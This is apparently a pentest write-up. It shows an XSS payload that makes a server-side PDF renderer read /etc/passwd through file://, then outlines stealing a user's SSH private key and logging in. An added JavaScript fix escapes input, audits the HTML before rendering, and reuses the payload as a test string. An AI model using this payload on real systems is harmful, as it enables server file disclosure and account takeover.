
Pentest XSS Attack To SSH

Situation:

  • The admin panel is vulnerable to XSS, and any uploaded file is converted to PDF.


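PoC from (

// Runs inside the server-side PDF renderer, so file:// resolves on the server.
x=new XMLHttpRequest;
// Write the file contents into the page that gets converted to PDF.
x.onload=function(){ document.write(this.responseText) };
x.open("GET","file:///etc/passwd"); x.send();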


Explaining it in images:


Next, download the PDF:

Reading /etc/passwd succeeded; next, try to read /home/user/.ssh/rsa_id

and:


Create a local id_rsa file, chmod it to 700, then try to SSH!
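
The fix on the application side, as an added example that is not part of the original post: encode every user-supplied field before it reaches the HTML-to-PDF converter, and audit the final document for anything the renderer would execute or load from outside http(s). The field names, template and function names are assumptions.

```javascript
// Added example, not from the original post. The field names, template and
// function names are assumptions made for illustration.
const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode a user-supplied value so the renderer treats it as text, never markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Audit a document before conversion: report anything the renderer would
// execute, or load through a URL scheme other than http(s).
function auditPdfHtml(html) {
  const findings = [];
  if (/<\s*(script|iframe|object|embed)\b/i.test(html)) findings.push("active-element");
  if (/<[^>]*\son[a-z]+\s*=/i.test(html)) findings.push("event-handler");
  const urlAttr = /<[^>]*\b(?:src|href|data|action)\s*=\s*["']?\s*(?!https?:)[a-z][a-z0-9+.-]*:/i;
  if (urlAttr.test(html)) findings.push("non-http-url");
  return findings;
}

// Build the HTML handed to the converter; refuse to render if the audit fires.
function buildPdfHtml(fields) {
  const html = "<html><body><h1>" + escapeHtml(fields.title) + "</h1><p>" +
    escapeHtml(fields.body) + "</p></body></html>";
  const findings = auditPdfHtml(html);
  if (findings.length > 0) throw new Error("refusing to render: " + findings.join(", "));
  return html;
}

// Constructed sample input: the payload shown in this post, submitted as a field.
const samplePayload = '<script>x=new XMLHttpRequest;' +
  'x.onload=function(){ document.write(this.responseText) };' +
  'x.open("GET","file:///etc/passwd"); x.send();</script>';

// What an unencoded template would hand to the renderer, and what the audit reports.
const rawFindings = auditPdfHtml("<p>" + samplePayload + "</p>");
// The encoded document: the payload survives only as visible text in the PDF.
const safeHtml = buildPdfHtml({ title: "Report", body: samplePayload });
console.log(rawFindings, auditPdfHtml(safeHtml));
```

Encoding is the primary control; the audit is a backstop for templates that legitimately contain markup. The converter itself should also run with script execution and local file access turned off, under an account that cannot read other users' home directories.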

